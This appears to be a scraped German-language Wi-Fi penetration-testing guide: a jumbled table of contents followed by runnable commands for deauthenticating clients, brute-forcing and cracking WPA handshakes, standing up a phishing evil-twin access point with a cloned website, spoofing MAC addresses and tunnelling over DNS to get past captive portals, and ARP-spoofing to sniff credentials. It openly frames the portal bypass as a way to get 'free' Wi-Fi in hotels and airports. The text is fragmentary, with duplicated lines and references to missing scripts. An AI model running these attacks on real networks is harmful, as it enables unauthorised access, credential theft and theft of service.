
Leitfaden für WLAN-Penetrationstests
2.1. Captive Portale
3.1. Keine Clients
4.1. Knacken des 4-Wege-Handshakes
4.2. PMKID-Angriff
4.3. AP-loser Angriff
5.1. Fake Access Points
5.2. Brute Force
6.1. Krack-Angriff und Frag-Angriff
6.2. OSINT
6.4. Weitere Frameworks
7.2. Arten von Scannern
7.3. Spoofing
VARIABLE=value
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
Monitormodus setzen
Airodump-ng ausführen
airodump-ng $IFACE -c $CHANNEL -e $ESSID
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
Listen Sie die Netzwerke mit Airodump-ng auf und notieren Sie die MAC-Adresse des AP ($AP_MAC) und die eines Clients ($CLIENT_MAC). Beenden Sie die Aufnahme nicht.
In einem anderen Terminal deauthentifizieren Sie einen Client oder alle. Wenn Airodump-ng einen Handshake von diesem Netzwerk erfasst, wird der Name oder die ESSID im ersten Terminal angezeigt:
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
Listen Sie die Netzwerke mit Airodump-ng auf und notieren Sie die MAC-Adresse des AP ($AP_MAC) und die eines Clients ($CLIENT_MAC). Beenden Sie die Aufnahme nicht.
2.a. Wörterbuchangriff ausführen
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
2.b. Oder einen Brute-Force-Angriff ausführen
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
Für den Zeichensatz können l (Kleinbuchstaben), u (Großbuchstaben), n (Zahlen), c (Klein- und Großbuchstaben), m (Klein- und Großbuchstaben + Zahlen) oder a (alle druckbaren Zeichen) verwendet werden.
Klonen Sie eine Website mit HTTrack
Installieren Sie Wifiphiser. Fügen Sie das HTTrack-Ergebnis in einem neuen Ordner unter wifiphisher/data/phishing-pages/new_page/html und eine Konfigurationsdatei unter wifiphisher/data/phishing-pages/new_page/config.ini hinzu.
Kompilieren Sie das Projekt mit python setup.py install oder der Binärdatei in bin neu.
Dieser Befehl funktioniert korrekt in der neuesten Kali-Version nach der Installation von hostapd:
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
Die erste Methode zur Umgehung eines Captive Portals besteht darin, Ihre MAC-Adresse in die eines bereits authentifizierten Benutzers zu ändern.
macchanger
Ein benutzerdefiniertes Skript wie dieses(Bash)
Außerdem können Sie Skripte zur Automatisierung des Prozesses verwenden, wie z.B.:
Eine zweite Methode ist das Erstellen eines DNS-Tunnels. Hierfür ist es notwendig, einen eigenen zugänglichen DNS-Server zu haben. Sie können diese Methode nutzen, um das Captive Portal zu umgehen und in Hotels, Flughäfen usw. "kostenloses" WLAN zu erhalten.
nslookup example.com
Einen "A-Eintrag": dns.$DOMAIN zeigt auf $SERVER_IP (Beispiel: dns.domain.com 139.59.172.117)
Einen "NS-Eintrag": hack.$DOMAIN zeigt auf dns.$DOMAIN (Beispiel: hack.domain.com dns.domain.com)
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
Überprüfen Sie, ob es korrekt funktioniert hier
Ausführung auf dem Client
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
ssh -D 8080 [email protected]
Sobald Sie im Netzwerk sind, können Sie testen, ob es anfällig für Man-in-the-Middle-Angriffe ist.
ARP-Spoofing-Angriff mit Ettercap
Sniffen des Datenverkehrs mit Wireshark oder TCPdump
Analysieren des Datenverkehrs mit PCredz (Linux) oder Network Miner (Windows)
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng $PCAP_FILE
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng -w $WORDLIST capture.cap
Sie können Wortlisten von hier herunterladen.
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
Sie können dieses Skript verwenden oder diese Schritte befolgen:
Installieren Sie Hcxdumptool und Hcxtool (Sie können dieses Skript verwenden).
Network Manager stoppen
airmon-ng check kill